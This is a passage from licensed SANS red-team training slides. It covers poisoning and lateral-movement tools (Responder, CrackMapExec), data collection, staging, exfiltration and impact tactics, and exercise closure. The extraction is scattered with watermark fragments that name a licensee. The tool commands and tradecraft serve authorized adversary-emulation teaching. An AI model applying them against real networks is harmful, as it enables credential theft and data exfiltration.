References: LLMNR/NBT-NS Poisoning and Relay: https://attack.mitre.org/techniques/T1171 Illustration created by Erik Van Buggenhout and is part of SANS SEC599: Defeating Advanced Adversaries Purple Team Tactics & Kill Chain Defenses: https://www.sans.org/course/defeating-advanced-adversaries-killchain-defenses

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

95

© SANS Institute 2020 Responder

090aff33bcb6e401ded410120bc9a268 • Responder is a LLMNR, NBT-NS and mDNS poisoner 26 ,2 02 0

• Built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server • Supports NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication • Also has an “Analyze” mode to listen without poisoning (-A)

Ap ril

[email protected] co

m

>

– UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587 and Multicast UDP 5553

o.

• Created by Laurent Gaffie from Spider Labs

SEC564 | Red Team Exercises and Adversary Emulation

96

ak

er

@ ya

ho

22829180 i< an

nm

Responder Responder is a python tool originally built as an LLMNR, NBT-NS, and MDNS (multicast DNS) poisoner. It has grown to an excellent network sniffer being able to listen on a number of ports/protocols for connections coming to the system running Responder. This means the target system must initiate a connection to you. We covered in SMB relay and NBT-NS slides how that is possible. Responder can also run its own authentication server to authenticate any system connecting to it. It supports SMB, MSSQL, HTTP(s), LDAP, FTP, POP3, IMAP, SMTP, DNS, and WPAD.

M

az

ze

Lincoln Mazzei nc o

ln

Responder has a configuration at Responder.conf and then you can simply run Responder: ./Responder.py Reference: https://github.com/SpiderLabs/Responder

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

96

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 CrackMapExec

090aff33bcb6e401ded410120bc9a268 • Post-exploitation for automated 26 ,2 02 0

lateral movement. • Focus is on AD • Contains many submodules:

– Impacket, Pywinrm, Pywerview, PowerSploit, Invoke-Obfuscation, Invoke-Vnc, Mimikittenz, NetRipper, RandomPS-Scripts, SessionGopher, Mimipenguin

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

97

ak

er

@ ya

ho

22829180 i< an

nm

CrackMapExec CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve its functionality and allowing it to evade most endpoint protection/IDS/IPS solutions. CME makes heavy use of the Impacket library (developed by @asolino) and the PowerSploit Toolkit (developed by @mattifestation) for working with network protocols and performing a variety of post-exploitation techniques. CrackMapExec is developed by @byt3bl33d3r from Black Hills Information Security.

M

az

ze

Lincoln Mazzei nc o

ln

Reference: https://github.com/byt3bl33d3r/CrackMapExec/wiki

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

97

© SANS Institute 2020 Lab 2.3: Defense Evasion, Credential Access, and Pivoting

Course Roadmap

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

98

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

98

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Click2.3 To| Edit Master Title Style Lab Defense Evasion, Credential Access, and Pivoting

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Please work on the lab exercise Lab 2.3 | Defense Evasion, Credential Access, and Pivoting

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

99

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

99

© SANS Institute 2020 Course Roadmap

Action on Objectives

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

100

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

100

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Action on Objectives

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Now it is time to achieve the emulated adversary objectives

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

101

ak

er

@ ya

ho

22829180 i< an

nm

Action on Objectives The final phase of the Unified Kill Chain is the Action on Objectives. These TTPs will depend on the adversary being emulated and the goals and objectives of the exercise. Most adversaries will be after data in which case they will need to collect it, stage it, and then exfiltrate it. Other malicious actors may be after denial of service, destructive attacks, or ransomware. Based on the goals and objectives, these steps will be different for each engagement.

az

ze

Lincoln Mazzei nc o

ln

M

Reference: https://www.csacademy.nl/images/scripties/2018/Paul-Pols---The-Unified-Kill-Chain.pdf

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

101

© SANS Institute 2020 Course Roadmap

Target Manipulation, Collection, and Exfiltration

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

102

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

102

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK TA0009

Collection

TM

090aff33bcb6e401ded410120bc9a268 Tactic used to identify and gather data from target network 26 ,2 02 0

• A common tactic of many adversaries is to steal information • Collection is the tactic that has the techniques for that goal – Audio Capture (listen in on conversations) – Clipboard Data (common for end users with password managers) – Data from storage (local disk, shared drives, etc.) – Input Capture (Keylogging) – Man in the Browser – Screen and Video Capture

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

103

ak

er

@ ya

ho

22829180 i< an

nm

Collection Collection consists of techniques used to identify and gather information, such as sensitive data, from a target prior to exfiltration. This is generally focused on the adversary objectives and needs to be clearly communicated to ensure Rules of Engagement are followed.

ze

az

M

ln

• •

Lincoln Mazzei

Audio Capture: Enabling the microphone to record conversations Automated Collection: Leveraged by adversary malware to automatically collect information related to lateral movement or objectives Clipboard Data: Stealing data used during copy and paste operations; covered in a previous slide Data from Information Repositories: Organizations share data through a number of repositories such as SharePoint or Confluence Data from Local System: Interesting data stored on the local file system Data from Network Shared Drive: Interesting data stored on network shares; it is common to see large, unprotected shares used by end users Data from Removable Media: Interesting data stored on external storage such as USB Data Staged: Moving data to a central location in preparation of exfiltration Email Collection: Reading target email looking for sensitive information Input Capture: Keylogging to obtain sensitive information; covered in credential access Man in the Browser: Hooking the browser to intercept end user browsing; often provides access to history, saved credentials, etc. Screen Capture: Taking screenshots to see what the end user is doing Video Capture: Taking video of the end user through the webcam

nc o

• •

• •

To :

ed

ns

ce

Li

• • • • •

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK • •

live

Reference: https://attack.mitre.org/tactics/TA0009/

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

103

© SANS Institute 2020 ATT&CK T1113

Screen Capture

TM

090aff33bcb6e401ded410120bc9a268 • Useful for obtaining sensitive 26 ,2 02 0

information • Ensure Rules of Engagement allows screen capture • Most Red Team and adversary malware has the capability of taking screen shots (Empire) > usemodule collection/screenshot

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

104

ak

er

@ ya

ho

22829180 i< an

nm

Screen Capture Red Team should attempt to take screen captures of the desktop to gather information over the course of an exercise. Screen capturing functionality is generally included in most Remote Access Tools created by adversaries and in most Red Team payloads for post-exploitation. It is also included as native features in some operating systems:

ln

M

On OSX, the native command screencapture is used to capture screenshots. On Linux, there is the native command xwd. On Empire, usemodule collection/screenshot.

nc o

• • •

az

ze

Lincoln Mazzei

Reference: https://attack.mitre.org/techniques/T1113/

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

104

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1074

Data Staging

TM

090aff33bcb6e401ded410120bc9a268 Move collected data to a central location for exfiltration • Common Protocols

26 ,2 02 0

• Client/Server Architecture • Push or Pull • OpSec

– TFTP – FTP – SCP, part of SSH suite – HTTP or HTTPS – SMB – NFS

[email protected] o.

co

m

>

Ap ril

– Encrypting in transit – Authentication

SEC564 | Red Team Exercises and Adversary Emulation

105

ak

er

@ ya

ho

22829180 i< an

nm

Data Staging Data staging consisting of moving the collected data to a central location in preparation for exfiltration. Moving files generally relies on a client/server architecture. The source and destination must have one or the other. Depending on the firewall rules, Red Team can push a file or pull files. Consider a protocol that encrypts data in transit and has authentication to not introduce risk.

az

ze

Lincoln Mazzei

TFTP: Stripped-down service moves files with no authentication between a tftp client and tftpd using UDP port 69. FTP: Familiar service conveniently moves files using two connections: An FTP data connection associated with TCP port 20 and an FTP control connection associated with TCP port 21. FTP, when used in ASCII mode, corrects some issues with moving text files between different operating systems, as we'll discuss soon. SCP, part of SSH suite: This program is part of the Secure Shell (SSH) suite and transfers files using TCP port 22 by default. It is an ideal candidate for file transfers, given that a) it encrypts all authentication information and data in transit, b) most networks allow outbound SSH, and c) many Linux and UNIX systems have an scp client built in. HTTP or HTTPS: These protocols are almost always allowed outbound, using at least TCP ports 80 and 443. Web browsers are found on most operating systems: Internet Explorer, wget, Lynx, etc. PowerShell includes a WebClient feature and an alias of wget to pull files. SMB: Built into Windows and available on *nix via Samba and very common on networks through the default TCP port of 445. NFS: This protocol is most commonly used to move files between UNIX/Linux systems, although there are also Windows NFS implementations. By default, it uses TCP and UDP 204, although it may involve other ports as well.

nc o



ln

M

There are many protocols used in internal networks to transfer files. The choice will be based on the tools available on the target system and the firewall rules:

• • •

Li

ce

ns



ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK •

live

Reference: https://attack.mitre.org/techniques/T1074/

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

105

© SANS Institute 2020 ATT&CK TA0010

Exfiltration

TM

090aff33bcb6e401ded410120bc9a268 Tactic that results in removing data from target network 26 ,2 02 0

• Compress and then encrypt data • Consider splitting data into smaller pieces • Leverage existing C2 or alternative

[email protected] m

>

Ap ril

– Protocol – Network Medium – Physical Medium

o.

co

• Blend in: Scheduled transfer during regular business hours

SEC564 | Red Team Exercises and Adversary Emulation

106

ak

er

@ ya

ho

22829180 i< an

nm

Exfiltration The exfiltration tactic covers techniques that result in the removal of files and data from the target network after collection. Collection tactic covers a technique of data staging where all the data is brought to an ideal location for removing. Now it is time for the Red Team to transfer the collected data from the target network to the Red Team network. Ensure the data being exfiltrated is allowed in the Rules of Engagement.

M

ln



Automated Exfiltration: Leveraging automated scripts after collection to exfiltrate data. Data Compressed: Making the data portable to minimize size before transferring; often leveraging 7zip, RAR, ZIP, and similar formats. Data Encrypted: Hide the data and important for operational security before transferring; same compression utilities can perform encryption. Data Transfer Size Limits: Splitting the data into smaller chunks for blending in; same compression/encryption utilities can perform splitting. Exfiltration Over Alternative Protocol: Leveraging a protocol other than current C2 such as FTP, DNS, HTTPS, SMTP, or cloud storage. Exfiltration Over Command and Control Channel: Exfiltrating over current C2 channels. Exfiltration Over Other Network Medium. Other network medium not used by current C2 such as Wi-Fi, Cellular, Bluetooth, or RF channels. Exfiltration Over Physical Medium: Removing data through USB or other external physical device. Scheduled Transfer: Blending in by transferring data during regular business hours.

nc o

• •

az

ze

Lincoln Mazzei

• •

To :

ed

ns

ce

• •

Li



Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK •

Reference: https://attack.mitre.org/tactics/TA0010/

106

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK TA0040

Impact

TM

090aff33bcb6e401ded410120bc9a268 New tactic added in April 2019 update 26 ,2 02 0

• Availability and integrity objectives • Rarely emulated by Red Team • Simulate or show position and privilege

o.

co

m

>

Ap ril

[email protected]

– Data Destruction, Encryption, or Manipulation – Denial of Service – Defacement – Disk Content or Structure Wipe – Service Stop

SEC564 | Red Team Exercises and Adversary Emulation

107

ak

er

@ ya

ho

22829180 i< an

nm

Impact The Impact tactic was added in the April 2019 release of the MITRE™ ATT&CK and represents techniques with the primary objective of reducing availability or integrity. These tactics are often called Destructive objectives and cover these 14 techniques:

ze

Lincoln Mazzei ln

M

az

Data Destruction: Deleting files or data on target systems. Data Encrypted for Impact: Encrypting data often for ransom. Defacement: Modifying the content of a target, often a web application. Disk Content Wipe: Deleting an entire disk. Disk Structure Wipe: Deleting or corrupting the entire hard drive data structure. Endpoint Denial of Service: Block availability of all services on endpoint. Firmware Corruption: Deleting BIOS or startup content to break startup processes. Inhibit System Recovery: Deleting backups or services used for recovery. Network Denial of Service: Degrading the network resources. Resource Hijacking: Leveraging the hardware of a system for resource intensive things like crypto mining. Runtime Data Manipulation: Integrity attack against the data being used. Service Stop: Denial of service at the service level. Stored Data Manipulation: Modifying integrity of data at rest. Transmitted Data Manipulation: Modifying integrity of data in motion/transmit.

nc o

• • • • • • • • • • • • • •

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

While these objectives may be realistic for the adversary the Red Team is emulating, it is rarely an objective the Red Team will carry out fully. Instead, these techniques may be simulated, or the Red Team can show they have reached a position and privilege where they can be carried out without impacting the target organization. References: Impact: https://attack.mitre.org/tactics/TA0040/ April 2019 Updates: https://attack.mitre.org/resources/updates/updates-april-2019/index.html

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

107

© SANS Institute 2020 Course Roadmap

Lab 2.4: Action on Objectives

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

108

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

108

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Click2.4 To| Edit Master Title Style Lab Action on Objectives

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Please work on the lab exercise Lab 2.4 | Action on Objectives

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

109

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

109

© SANS Institute 2020 Course Roadmap

Exercise Closure

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

110

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

110

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Exercise Closure

– Red Team Reveal – Replay – Purple Team

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 • Analysis and Response Threat Intelligence

Closure

• Reporting • Remediation and Action Plan

Testing

Planning

o.

co

m

>

– People – Process – Technology

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

111

ak

er

@ ya

ho

22829180 i< an

nm

Exercise Closure While it may feel like the Red Team Exercise and Adversary Emulation is now over, one of the most important phases of the framework is required. This is arguably where the value of the entire effort is provided to the target organization based on what was identified during the testing phase.

ze

Lincoln Mazzei nc o

ln

M

az

Analysis & Response: Organized and led by the Project Manager, this phase will have the Red Team present to the Blue Team all the actions performed during testing, often called a Red Team Reveal. The Blue Team will be tasked with correlating actions with the events they witnesses, Incident Response process followed, and communication that occurred. This phase may also include a replay where a Purple Team exercise is performed, non-blind for the Blue Team to follow along technically as TTPs are repeated. Reporting: Creating a report is crucial and will be references for months or even years after the exercise closure. The entire extent of the exercise, from Threat Intelligence to Planning to Testing to Analysis and Response, will be documented. These reports should be reviewed by all Trusted Agents prior to final draft publishing. Generally, the Project Manager will take lead of compiling the report. Remediation and Action Plan: The last phase is documenting how the target organization plans to remediate the identified issues and create an action plan against it. It is important that the Red Team distance themselves from this phase and allow the engineers and business to create their action plan. The Red Team may recommend a number of solutions but ultimately, the stakeholders for each item should come together and provide this themselves. This phase is also led and organized by the Project Manager.

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

111

© SANS Institute 2020 Red Team Actions for Exercise Closure

090aff33bcb6e401ded410120bc9a268 After objective is achieved, some additional steps: • All modifications and mechanisms must be removed at the end of the exercise

26 ,2 02 0

• Consolidate all data and logs: – All Red Team logs and notes – Data collected

[email protected]

– Revert all system modifications – Remove all access mechanisms – Remove C2 mechanisms

o.

co

m

>

Ap ril

• Red Team Lead review and acceptance • Archive, hash, and securely store all data • Final Report

SEC564 | Red Team Exercises and Adversary Emulation

112

ak

er

@ ya

ho

22829180 i< an

nm

Red Team Actions for Exercise Closure While this section will cover project management type closure activities from various frameworks presented on Day 1, many people forget the Red Team needs to perform some closure activities as well. Once the objective is achieved, the Project Manager and other trusted agents should decide whether to maintain access to the systems and inject triggers for measuring other Blue Team responses or if the Red Team should clean up, pack up, and close the technical portion of the exercise.

az

ze

Lincoln Mazzei nc o

ln

M

The Red Team lead should ensure all data and logs were saved and securely stored. All systems should be cleaned up and left how they were originally found. That means killing all payloads and remote connections. The attack infrastructure should be brought down and removed from listening on the internet.

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

112

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Course Roadmap

Analysis and Response

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

113

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

113

© SANS Institute 2020 Red Team Reveal

090aff33bcb6e401ded410120bc9a268 Work together as one large team led by Project Manager 26 ,2 02 0

Limit attendance to Blue Team and Trusted Agents for now Project Manager to present Threat Intelligence and Planning Red Team to present a timeline and step-by-step actions Blue Team will have all kinds of questions for the Red Team This can be a moment of excitement if done correctly Keeping the relationship healthy is critical for internal teams Red Team should be viewed as an invaluable sparring partner

co

m

>

Ap ril

[email protected] o.

• • • • • • •

SEC564 | Red Team Exercises and Adversary Emulation

114

ak

er

@ ya

ho

22829180 i< an

nm

Red Team Reveal The “blind” part of the exercise is complete; it is time to come together as one large team to perform Exercise Closure steps. The Project Manager will organize and lead the Red Team reveal. This is where the Blue Team that are not Trusted Agents will hear the end-to-end story of Red Team actions. It is recommended that audience be limited at this phase as to not embarrass anyone or facilitate a stakeholder to perform actions/remediation on the fly. Trusted Agents may be invited as they have heard most of the actions as they occurred during the daily briefings.

az

ze

Lincoln Mazzei nc o

ln

M

The Project Manager should lead the presentation and start with the Threat Intelligence and Planning phase. A member of the Threat Intelligence team may present their respective part. Red Team should present the actions performed at a high level as the adversary emulation occurred following the Threat Intelligence provided. Blue Team will have many questions for the Red Team. It is important the Project Manager lead this session and maintain it while being energetic and friendly. For internal teams, the relationship should grow, not be adversarial.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Reference: https://github.com/magoo/redteam-plan#mag-red-team-reveal

live

114

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Red Team Reveal

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

115

ak

er

@ ya

ho

22829180 i< an

nm

Red Team Reveal This slide shows an example of how to illustrate the high-level actions performed by the Red Team during the Adversary Emulation exercise. There are many ways to visualize: Charts, timelines, or a solution like VECTR.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

115

© SANS Institute 2020 Analysis and Response (1)

090aff33bcb6e401ded410120bc9a268 • Are the Red Team's actions during the attack phase well 26 ,2 02 0

Ap ril

o.

co

• •

[email protected] >



m



documented and understood? Has the incident response process missed any substantial Red Team actions? Are there any IoCs or artifacts that are still beaconing or discoverable in the future? Have any artifacts or other IOCs survived incident response? How thorough was the Blue Team’s incident response through eradication and lessons learned?

SEC564 | Red Team Exercises and Adversary Emulation

116

ak

er

@ ya

ho

22829180 i< an

nm

Analysis and Response (1) The Red Team Reveal meeting will result in many questions and some work for the Blue Team. Here, we cover some aspects that may come up based on author experiences:

Lincoln Mazzei nc o

ln

M

az

ze

Are the Red Team's actions during the attack phase well documented and understood? The Red Team should also be measured during Analysis and Response phase to ensure they followed the Threat Intelligence and Planning phase components, especially the Rules of Engagement and documenting all actions. Has the incident response process missed any substantial Red Team actions? By the end of the exercise, all Red Team infrastructure and payloads should be dead. If not, they may be used in Replay or for a Purple Team reveal coming up shortly. Are there any IoCs or artifacts that are still beaconing or discoverable in the future? While the Red Team tried to clean up as much as possible, are there any artifacts or payloads still on the target systems that were not removed? Have any artifacts or other IOCs survived incident response? Empire has a kill date that can be configured on its beacons as shown on Day 1. This is a reason why Red Team must understand all their tools and payloads. How thorough was the Blue Team’s incident response through eradication and lessons learned? This is not a perfect metric but more observable. Other items will have much better metrics, such as time to detect initial access.

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Reference: https://github.com/magoo/redteam-plan#skull-post-mortem

live

116

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Analysis & Response

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

117

ak

er

@ ya

ho

22829180 i< an

nm

Analysis and Response (2) The screenshot is from the VECTR tool when a test case is being filled out. The left side is the Red Teamwork, which should be tracked and logged as discussed throughout the course. The right side is the Blue Team details. The Project Manager can sit with the Blue Team Trusted Agent and populate the fields:

ze

Lincoln Mazzei ln

M

az

Outcome: Was the event logged, blocked, or alerted? What tool logged the activity or should have logged the activity What was the severity of the alert? What time was the item logged? What layer of security should have seen this test case? Other notes and behavior can be logged in the remaining fields.

nc o

• • • • • •

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Reference: https://vectr.io/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

117

© SANS Institute 2020 Replay

case or action to properly determine if something was logged or alerted after the exercise • The replay is an excellent learning opportunity for non-technical staff and Blue Team members • Presenting is valuable but seeing is believing • Does not have to be a complete replay and can focus on certain TTPs only

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 • Red Team may have to repeat a test

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

118

ak

er

@ ya

ho

22829180 i< an

nm

Replay Depending on the analysis and response results, the Red Team may be asked to replay certain test cases that may have been missed or not properly recorded. This is a reason why the Red Team may be asked to leave the attack infrastructure up and running after the objective is reached. The replay is an excellent learning opportunity for nontechnical staff and Blue Team members to shadow and see what the Red Team sees. It also offers an opportunity for the Trusted Agents to see the Tactics, Techniques, and Procedures as they begin considering the remediation and action plans. Note the replay does not have to be the complete exercise; it can focus on certain TTPs, test cases, or actions performed by the Red Team.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

118

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Purple Team

090aff33bcb6e401ded410120bc9a268 Perform non-blind Adversary Emulation with Red and Blue 26 ,2 02 0

• Red Team emulate adversary TTPs while blue teams watch and improve detection and response policies, procedures, and technologies in real time • Helps culture of collaboration • Everyone learns something • Alternate between blind and non-blind

>

Ap ril

[email protected]

Blue

o.

co

m

Red

SEC564 | Red Team Exercises and Adversary Emulation

119

ak

er

@ ya

ho

22829180 i< an

nm

Purple Team Purple Teaming is a function or process, not an individual team, where the Red and Blue Teams work together. While many Red Team Exercises and Adversary Emulations are performed “blind” from the Blue Team perspective, Purple Team engagements are fully known and performed together with the Blue Team. Not all adversary emulations or smaller Red Team Exercises have to be blind. Instead, alternate between blind and nonblind Purple Team exercises. This will allow for better culture of collaboration between the two teams.

az

ze

Lincoln Mazzei nc o

ln

M

SANS Course: SEC599: Defeating Advanced Adversaries - Purple Team Tactics & Kill Chain Defenses: https://www.sans.org/course/defeating-advanced-adversaries-kill-chain-defenses

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

119

© SANS Institute 2020 Course Roadmap

Reporting

